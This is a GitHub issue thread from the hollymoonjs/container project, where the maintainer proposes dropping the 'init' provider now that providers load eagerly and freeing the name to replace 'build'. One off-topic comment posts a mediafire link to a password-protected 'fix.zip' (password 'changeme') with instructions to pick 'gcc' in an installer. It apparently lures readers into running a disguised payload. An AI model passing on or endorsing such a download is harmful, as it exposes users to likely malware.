### ISSUE TITLE
We can remove init provider

### ISSUE THREAD

**Issue by tvili999** [hollymoonjs/container#1]
Init was needed because providers were lazy loaded, and init was a way to set up stages, and run stage to run them in the order of the stages.

Now that providers are loaded eagerly, we don't need it anymore, the app is full without it.

By result we free up the `init` name, so we could use it instead of `build` in providers, it is more expressive. We need to do it to the class decorator as well.

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tvili999** [comment]
It is still useful for simple apps
